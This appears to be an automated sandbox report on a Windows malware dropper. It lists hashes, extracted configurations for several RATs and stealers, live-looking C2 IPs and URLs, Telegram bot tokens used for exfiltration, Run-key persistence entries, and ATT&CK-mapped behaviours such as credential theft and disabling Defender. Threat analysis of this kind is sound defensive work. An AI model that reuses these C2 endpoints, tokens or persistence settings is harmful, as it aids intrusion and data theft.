asyncrat | 8a1bb126b4ed6851a845ee584bda3fe7d51ad367e794f0a9432613028126e8ea

Analysis

max time kernel
30s
max time network
468s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250218-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250218-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
14/03/2025, 02:20

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

New Text Document mod.exe
Size

8KB
MD5

69994ff2f00eeca9335ccd502198e05b
SHA1

b13a15a5bea65b711b835ce8eccd2a699a99cead
SHA256

2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2
SHA512

ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3
SSDEEP

96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1

Malware Config

Extracted

Family

xworm

Version

5.0

92.255.85.66:7000

92.255.57.221:4414

Mutex

TLnTK5toQe3huGph

Attributes

install_file
USB.exe

aes.plain

Extracted

Family

formbook

Version

4.1

Campaign

mtpi

Decoy

prettylitthings.shop

bemellow.net

jahman.xyz

prostadineonlinestore.shop

lost-cl.club

raphic-design-degree-21165.bond

monitoring-devices-99252.bond

purrizon.life

binaryaltcoin.xyz

accesspointfile.buzz

nlpga.club

apartments-for-rent-64633.bond

hustle.family

gdplay.info

dewa212-rtp.bond

orseopdo.shop

buktimenangpolo.lol

debt-relief-73622.bond

bank-owned-cars-us-107.today

magicai.digital

Extracted

Family

formbook

Version

4.1

Campaign

hwu6

Decoy

lf758.vip

locerin-hair.shop

vytech.net

pet-insurance-intl-7990489.live

thepolithat.buzz

d66dr114gl.bond

suv-deals-49508.bond

job-offer-53922.bond

drstone1.click

lebahsemesta57.click

olmanihousel.shop

piedmontcsb.info

trisula888x.top

66sodovna.net

dental-implants-83810.bond

imxtld.club

frozenpines.net

ffgzgbl.xyz

tlc7z.rest

alexismuller.design

Extracted

Family

lumma

https://reloadrevol.bet/api

https://crosshairc.life/api

https://mrodularmall.top/api

https://ojowinjoinery.icu/api

https://legenassedk.top/api

https://htardwarehu.icu/api

https://cjlaspcorne.icu/api

https://bugildbett.top/api

https://weaponrywo.digital/api

https://kbracketba.shop/api

https://featureccus.shop/api

https://jowinjoinery.icu/api

https://latchclan.shop/api

Extracted

Family

darkcloud

https://api.telegram.org/bot6107929879:AAHV6JwXs7rcYzMGLe3_opR5_gdKAC16Ye4/sendMessage?chat_id=6311012313

Extracted

Family

vipkeylogger

https://api.telegram.org/bot7692968455:AAFUd6DDUCm9bBSVBpp5I0Oudm0YDdn6C3o/sendMessage?chat_id=6163418482

Extracted

Family

remcos

Botnet

Yavakosa

198.23.227.212:32583

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
yavascript.exe
copy_folder
xenor
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
install_path
%AppData%
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-DJTZHJ
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Extracted

Family

remcos

Botnet

firefox mts

91.135.156.200:8109

Attributes

audio_folder
Ìèêðîôîííûå çàïèñè
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
app.exe
copy_folder
firefox tsms
delete_file
true
hide_file
true
hide_keylog_file
true
install_flag
true
install_path
%AppData%
keylog_crypt
true
keylog_file
cfg.dat
keylog_flag
false
keylog_folder
firefox mssd
keylog_path
%AppData%
mouse_option
false
mutex
Ðìê-HQT17V
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Ñêðèíøîòû
screenshot_path
%AppData%
screenshot_time
10
startup_value
take_screenshot_option
false
take_screenshot_time
5

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

20.229.103.183:4000

Mutex

DcRatMutex_qwqdanchun

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

20.229.103.183:5000

Mutex

4LGhzqWlUmPX

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

systembc

towerbingobongoboom.com

62.60.226.86

Attributes

dns
5.132.191.104

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
DarkCloud
An information stealer written in Visual Basic.
stealer darkcloud
Darkcloud family
darkcloud

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

defense_evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
5812	MpCmdRun.exe

Detect Poverty Stealer Payload 1 IoCs

resource	yara_rule
behavioral2/files/0x000f000000028041-2311.dat	family_povertystealer

Detect Xworm Payload 6 IoCs

resource	yara_rule
behavioral2/files/0x0008000000027f15-7.dat	family_xworm
behavioral2/memory/3148-17-0x0000000000870000-0x000000000087E000-memory.dmp	family_xworm
behavioral2/files/0x0008000000027f1e-66.dat	family_xworm
behavioral2/memory/3412-68-0x0000000000580000-0x000000000058E000-memory.dmp	family_xworm
behavioral2/files/0x000900000002802b-2014.dat	family_xworm
behavioral2/memory/7092-2022-0x0000000000310000-0x0000000000352000-memory.dmp	family_xworm

Formbook
Formbook is a data stealing malware which is capable of stealing data.
trojan spyware stealer formbook
Formbook family
formbook
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Modiloader family
modiloader
Poverty Stealer
Poverty Stealer is a crypto and infostealer written in C++.
stealer povertystealer
Povertystealer family
povertystealer
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 5180 created 3076	5180	rdha.exe	51

SystemBC
SystemBC is a proxy and remote administration tool first seen in 2019.
trojan systembc
Systembc family
systembc
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
stealer keylogger vipkeylogger
Vipkeylogger family
vipkeylogger

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral2/files/0x0008000000027fbf-3330.dat	family_xmrig
behavioral2/files/0x0008000000027fbf-3330.dat	xmrig

Xmrig family
xmrig
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Async RAT payload 2 IoCs

rat

resource	yara_rule
behavioral2/files/0x000b000000027f9f-711.dat	family_asyncrat
behavioral2/files/0x000b000000027f81-1479.dat	family_asyncrat

Detected Nirsoft tools 4 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/5336-347-0x0000000000400000-0x000000000047D000-memory.dmp	Nirsoft
behavioral2/memory/4840-356-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/5424-360-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/5336-348-0x0000000000400000-0x000000000047D000-memory.dmp	Nirsoft

Formbook payload 4 IoCs

rat

resource	yara_rule
behavioral2/memory/3880-39-0x0000000000400000-0x000000000042F000-memory.dmp	formbook
behavioral2/memory/3476-89-0x0000000000400000-0x000000000042F000-memory.dmp	formbook
behavioral2/memory/3636-195-0x00000000007D0000-0x00000000007FF000-memory.dmp	formbook
behavioral2/memory/4744-204-0x0000000000380000-0x00000000003AF000-memory.dmp	formbook

ModiLoader Second Stage 9 IoCs

resource	yara_rule
behavioral2/memory/3172-193-0x00000000037B0000-0x00000000047B0000-memory.dmp	modiloader_stage2
behavioral2/memory/3172-404-0x00000000037B0000-0x00000000047B0000-memory.dmp	modiloader_stage2
behavioral2/memory/3172-407-0x00000000037B0000-0x00000000047B0000-memory.dmp	modiloader_stage2
behavioral2/memory/3172-411-0x00000000037B0000-0x00000000047B0000-memory.dmp	modiloader_stage2
behavioral2/memory/3172-410-0x00000000037B0000-0x00000000047B0000-memory.dmp	modiloader_stage2
behavioral2/memory/3172-409-0x00000000037B0000-0x00000000047B0000-memory.dmp	modiloader_stage2
behavioral2/memory/3172-406-0x00000000037B0000-0x00000000047B0000-memory.dmp	modiloader_stage2
behavioral2/memory/3172-405-0x00000000037B0000-0x00000000047B0000-memory.dmp	modiloader_stage2
behavioral2/memory/3172-408-0x00000000037B0000-0x00000000047B0000-memory.dmp	modiloader_stage2

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/4840-356-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 2 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/5336-347-0x0000000000400000-0x000000000047D000-memory.dmp	WebBrowserPassView
behavioral2/memory/5336-348-0x0000000000400000-0x000000000047D000-memory.dmp	WebBrowserPassView

Adds policy Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	crossings.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\￐￬￪-QPMRI0 = "\"C:\\Users\\Admin\\AppData\\Roaming\\firefox tsm\\firefox tsm.exe\""	crossings.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	firefox tsm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\￐￬￪-QPMRI0 = "\"C:\\Users\\Admin\\AppData\\Roaming\\firefox tsm\\firefox tsm.exe\""	firefox tsm.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2992	powershell.exe
7640	powershell.exe
6476	powershell.exe
4400	powershell.exe
5448	powershell.exe
9568	powershell.EXE
5084	powershell.exe
6432	powershell.exe
3720	powershell.exe
3504	powershell.exe
6212	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 23 IoCs

flow	pid	Process
27	3812	New Text Document mod.exe
27	3812	New Text Document mod.exe
27	3812	New Text Document mod.exe
27	3812	New Text Document mod.exe
27	3812	New Text Document mod.exe
27	3812	New Text Document mod.exe
34	3812	New Text Document mod.exe
44	3660	notyhkkadaw.exe
9	3812	New Text Document mod.exe
40	3812	New Text Document mod.exe
93	3812	New Text Document mod.exe
124	3812	New Text Document mod.exe
75	5492	BYKNLOLR1L9ZCZTG4KA.exe
112	3812	New Text Document mod.exe
74	5492	BYKNLOLR1L9ZCZTG4KA.exe
28	3812	New Text Document mod.exe
54	3812	New Text Document mod.exe
54	3812	New Text Document mod.exe
54	3812	New Text Document mod.exe
54	3812	New Text Document mod.exe
54	3812	New Text Document mod.exe
43	3812	New Text Document mod.exe
11	3812	New Text Document mod.exe

Modifies Windows Firewall 2 TTPs 3 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4668	netsh.exe
12992	netsh.exe
10208	netsh.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 37 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
3688	msedge.exe
13180	chrome.exe
11448	msedge.exe
6212	msedge.exe
8668	msedge.exe
13188	chrome.exe
9904	chrome.exe
4224	msedge.exe
4852	msedge.exe
9284	msedge.exe
6116	msedge.exe
4012	Chrome.exe
11848	msedge.exe
12976	msedge.exe
8468	msedge.exe
10912	msedge.exe
12916	msedge.exe
12096	chrome.exe
13296	chrome.exe
10944	msedge.exe
11496	msedge.exe
4228	msedge.exe
5660	msedge.exe
9336	msedge.exe
8668	msedge.exe
12956	msedge.exe
9864	msedge.exe
7624	chrome.exe
5668	msedge.exe
3856	msedge.exe
1336	msedge.exe
2892	msedge.exe
9784	msedge.exe
10200	msedge.exe
9380	msedge.exe
6412	msedge.exe
9584	msedge.exe

.NET Reactor proctector 1 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral2/files/0x00070000000280db-4529.dat	net_reactor

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000\Control Panel\International\Geo\Nation	New Text Document mod.exe
Key value queried	\REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000\Control Panel\International\Geo\Nation	readerupdate2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000\Control Panel\International\Geo\Nation	thawdtyh.exe
Key value queried	\REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000\Control Panel\International\Geo\Nation	nyoilsafkjawd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000\Control Panel\International\Geo\Nation	crossings.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
7260	powershell.exe
524	cmd.exe

Executes dropped EXE 30 IoCs

pid	Process
3148	g.exe
376	mackobatric2.1.exe
3660	notyhkkadaw.exe
3412	x.exe
2340	jonobatric2.1.exe
864	readerupdate2.exe
5180	rdha.exe
1212	cssos.exe
5492	BYKNLOLR1L9ZCZTG4KA.exe
3172	csrss.exe
2832	noypjksdaw.exe
5260	Service.exe
5356	fireballs.exe
1136	kent.exe
3280	cozyrem.exe
4288	believe.exe
1192	CONVERTER.exe
1864	muk.exe
1988	1776871603.exe
4900	thawdtyh.exe
240	nyoilsafkjawd.exe
4844	uptime.exe
5668	crossings.exe
3136	boilfdsefSQ.exe
3316	app.exe
2996	alpha.pif
1820	firefox tsm.exe
320	alpha.pif
1176	explorer.exe
1476	casse.exe

Loads dropped DLL 1 IoCs

pid	Process
5180	rdha.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	recover.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key opened	\REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key opened	\REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 11 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\￐￬￪-HQT17V = "\"C:\\Users\\Admin\\AppData\\Roaming\\firefox tsms\\app.exe\""	nyoilsafkjawd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\￐￬￪-HQT17V = "\"C:\\Users\\Admin\\AppData\\Roaming\\firefox tsms\\app.exe\""	nyoilsafkjawd.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ROA35Q-Y3LF93 = "\"C:\\Users\\Admin\\AppData\\Roaming\\update\\uptime.exe\""	uptime.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\￐￬￪-QPMRI0 = "\"C:\\Users\\Admin\\AppData\\Roaming\\firefox tsm\\firefox tsm.exe\""	crossings.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\￐￬￪-QPMRI0 = "\"C:\\Users\\Admin\\AppData\\Roaming\\firefox tsm\\firefox tsm.exe\""	crossings.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\￐￬￪-HQT17V = "\"C:\\Users\\Admin\\AppData\\Roaming\\firefox tsms\\app.exe\""	app.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\￐￬￪-QPMRI0 = "\"C:\\Users\\Admin\\AppData\\Roaming\\firefox tsm\\firefox tsm.exe\""	firefox tsm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ROA35Q-Y3LF93 = "\"C:\\Users\\Admin\\AppData\\Roaming\\update\\uptime.exe\""	thawdtyh.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "C:\\Users\\Admin\\AppData\\Local\\explorer.exe"	1776871603.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\￐￬￪-HQT17V = "\"C:\\Users\\Admin\\AppData\\Roaming\\firefox tsms\\app.exe\""	app.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\￐￬￪-QPMRI0 = "\"C:\\Users\\Admin\\AppData\\Roaming\\firefox tsm\\firefox tsm.exe\""	firefox tsm.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs

Web Service

T1102

flow	ioc
976	raw.githubusercontent.com
26	raw.githubusercontent.com
27	raw.githubusercontent.com
66	pastebin.com
102	raw.githubusercontent.com
979	raw.githubusercontent.com
65	pastebin.com
120	raw.githubusercontent.com
329	bitbucket.org
331	bitbucket.org

Looks up external IP address via web service 7 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
49	reallyfreegeoip.org
50	reallyfreegeoip.org
57	api.ipify.org
95	reallyfreegeoip.org
100	ip-api.com
131	reallyfreegeoip.org
47	checkip.dyndns.org

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Power Settings 1 TTPs 10 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
5908	cmd.exe
3628	powercfg.exe
8512	powercfg.exe
8520	powercfg.exe
8532	powercfg.exe
12580	cmd.exe
2720	powercfg.exe
2972	powercfg.exe
8164	powercfg.exe
8556	powercfg.exe

AutoIT Executable 4 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x0007000000027f1c-23.dat	autoit_exe
behavioral2/files/0x0007000000027f20-73.dat	autoit_exe
behavioral2/files/0x000b000000027f25-139.dat	autoit_exe
behavioral2/files/0x0007000000027f8b-659.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 39 IoCs

discovery

Process Discovery

T1057

pid	Process
6468	tasklist.exe
7252	tasklist.exe
4992	tasklist.exe
4056	tasklist.exe
7220	tasklist.exe
6060	tasklist.exe
5248	tasklist.exe
6864	tasklist.exe
6444	tasklist.exe
4724	tasklist.exe
8840	tasklist.exe
4668	tasklist.exe
556	tasklist.exe
1076	tasklist.exe
6264	tasklist.exe
6924	tasklist.exe
3400	tasklist.exe
8288	tasklist.exe
7416	tasklist.exe
4700	tasklist.exe
7460	tasklist.exe
5316	tasklist.exe
8780	tasklist.exe
8304	tasklist.exe
6580	tasklist.exe
5376	tasklist.exe
784	tasklist.exe
9064	tasklist.exe
6280	tasklist.exe
8840	tasklist.exe
9084	tasklist.exe
7124	tasklist.exe
5452	tasklist.exe
2000	tasklist.exe
5944	tasklist.exe
8104	tasklist.exe
2912	tasklist.exe
1548	tasklist.exe
8756	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

pid	Process
3660	notyhkkadaw.exe
3660	notyhkkadaw.exe
2832	noypjksdaw.exe
2832	noypjksdaw.exe
3660	notyhkkadaw.exe
2832	noypjksdaw.exe

Suspicious use of SetThreadContext 13 IoCs

description	pid	Process	procid_target
PID 376 set thread context of 3880	376	mackobatric2.1.exe	87
PID 3880 set thread context of 3536	3880	svchost.exe	56
PID 2340 set thread context of 3476	2340	jonobatric2.1.exe	94
PID 3476 set thread context of 3536	3476	svchost.exe	56
PID 1212 set thread context of 4972	1212	cssos.exe	109
PID 3636 set thread context of 3536	3636	ipconfig.exe	56
PID 4744 set thread context of 3536	4744	cscript.exe	56
PID 1136 set thread context of 5336	1136	kent.exe	133
PID 1136 set thread context of 4840	1136	kent.exe	134
PID 1136 set thread context of 5424	1136	kent.exe	381
PID 3316 set thread context of 772	3316	app.exe	156
PID 1820 set thread context of 3096	1820	firefox tsm.exe	160
PID 3096 set thread context of 404	3096	iexplore.exe	162

UPX packed file 32 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000027f6a-338.dat	upx
behavioral2/memory/1864-345-0x0000000000400000-0x0000000000489000-memory.dmp	upx
behavioral2/memory/1864-682-0x0000000000400000-0x0000000000489000-memory.dmp	upx
behavioral2/memory/6780-1472-0x00007FFE62880000-0x00007FFE62E69000-memory.dmp	upx
behavioral2/memory/6780-1489-0x00007FFE74B20000-0x00007FFE74B2F000-memory.dmp	upx
behavioral2/memory/6780-1488-0x00007FFE65F50000-0x00007FFE65F73000-memory.dmp	upx
behavioral2/memory/6780-1496-0x00007FFE67660000-0x00007FFE6768D000-memory.dmp	upx
behavioral2/memory/6780-1498-0x00007FFE67610000-0x00007FFE67633000-memory.dmp	upx
behavioral2/memory/6780-1499-0x00007FFE67340000-0x00007FFE674B7000-memory.dmp	upx
behavioral2/memory/6780-1497-0x00007FFE67640000-0x00007FFE67659000-memory.dmp	upx
behavioral2/memory/6780-1500-0x00007FFE675F0000-0x00007FFE67609000-memory.dmp	upx
behavioral2/memory/6780-1501-0x00007FFE7C7F0000-0x00007FFE7C7FD000-memory.dmp	upx
behavioral2/memory/6780-1502-0x00007FFE675B0000-0x00007FFE675E3000-memory.dmp	upx
behavioral2/memory/6780-1504-0x00007FFE67270000-0x00007FFE6733D000-memory.dmp	upx
behavioral2/memory/6780-1507-0x00007FFE65F50000-0x00007FFE65F73000-memory.dmp	upx
behavioral2/memory/6780-1506-0x00007FFE63510000-0x00007FFE63A30000-memory.dmp	upx
behavioral2/memory/6780-1514-0x00007FFE67640000-0x00007FFE67659000-memory.dmp	upx
behavioral2/memory/6780-1515-0x00007FFE67150000-0x00007FFE6726C000-memory.dmp	upx
behavioral2/memory/6780-1511-0x00007FFE67660000-0x00007FFE6768D000-memory.dmp	upx
behavioral2/memory/6780-1510-0x00007FFE7B4A0000-0x00007FFE7B4AD000-memory.dmp	upx
behavioral2/memory/6780-1509-0x00007FFE67590000-0x00007FFE675A4000-memory.dmp	upx
behavioral2/memory/6780-1503-0x00007FFE62880000-0x00007FFE62E69000-memory.dmp	upx
behavioral2/memory/6780-1544-0x00007FFE67340000-0x00007FFE674B7000-memory.dmp	upx
behavioral2/memory/6780-1542-0x00007FFE67610000-0x00007FFE67633000-memory.dmp	upx
behavioral2/memory/6780-1566-0x00007FFE675F0000-0x00007FFE67609000-memory.dmp	upx
behavioral2/memory/6780-1604-0x00007FFE675B0000-0x00007FFE675E3000-memory.dmp	upx
behavioral2/files/0x0007000000027ff3-1616.dat	upx
behavioral2/memory/7712-1630-0x00007FF6DB750000-0x00007FF6DBF71000-memory.dmp	upx
behavioral2/memory/6780-1627-0x00007FFE67270000-0x00007FFE6733D000-memory.dmp	upx
behavioral2/memory/6780-1689-0x00007FFE63510000-0x00007FFE63A30000-memory.dmp	upx
behavioral2/files/0x00020000000274ee-3472.dat	upx
behavioral2/files/0x00090000000280b4-4173.dat	upx

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\chrome_debug.log	Chrome.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\chrome_debug.log	msedge.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
7328	sc.exe
1820	sc.exe
416	sc.exe
8288	sc.exe
8452	sc.exe
7964	sc.exe
8016	sc.exe
3572	sc.exe
7564	sc.exe
4684	sc.exe
8208	sc.exe
8340	sc.exe
4796	sc.exe
7356	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 31 IoCs

pid	pid_target	Process	procid_target
6040	2340	WerFault.exe	93
5112	1212	WerFault.exe	107
952	1476	WerFault.exe	167
6432	7144	WerFault.exe	189
7492	7600	WerFault.exe	277
7984	8096	WerFault.exe	283
6636	8152	WerFault.exe	296
4808	1640	WerFault.exe	302
3568	7468	WerFault.exe	305
6108	6392	WerFault.exe	308
7376	2988	WerFault.exe	316
8004	6420	WerFault.exe	321
7000	8080	WerFault.exe	327
440	2612	WerFault.exe	335
7120	7840	WerFault.exe	342
7544	1988	WerFault.exe	347
6492	7428	WerFault.exe	357
7740	7224	WerFault.exe	513
7608	2120	WerFault.exe	535
7976	5568	WerFault.exe	603
7088	9172	WerFault.exe	607
7828	2428	WerFault.exe	611
2536	1376	WerFault.exe	623
4076	7284	WerFault.exe	601
8596	2120	WerFault.exe	645
11880	8936	WerFault.exe	592
12300	4064	WerFault.exe	643
9560	1216	WerFault.exe	642
1172	10628	WerFault.exe	679
8224	13120	WerFault.exe	748
12164	6768	WerFault.exe	818

System Location Discovery: System Language Discovery 1 TTPs 40 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iexplore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nyoilsafkjawd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rdha.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fontdrvhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cozyrem.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	muk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	recover.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mackobatric2.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fireballs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	boilfdsefSQ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	app.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cssos.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	firefox tsm.exe
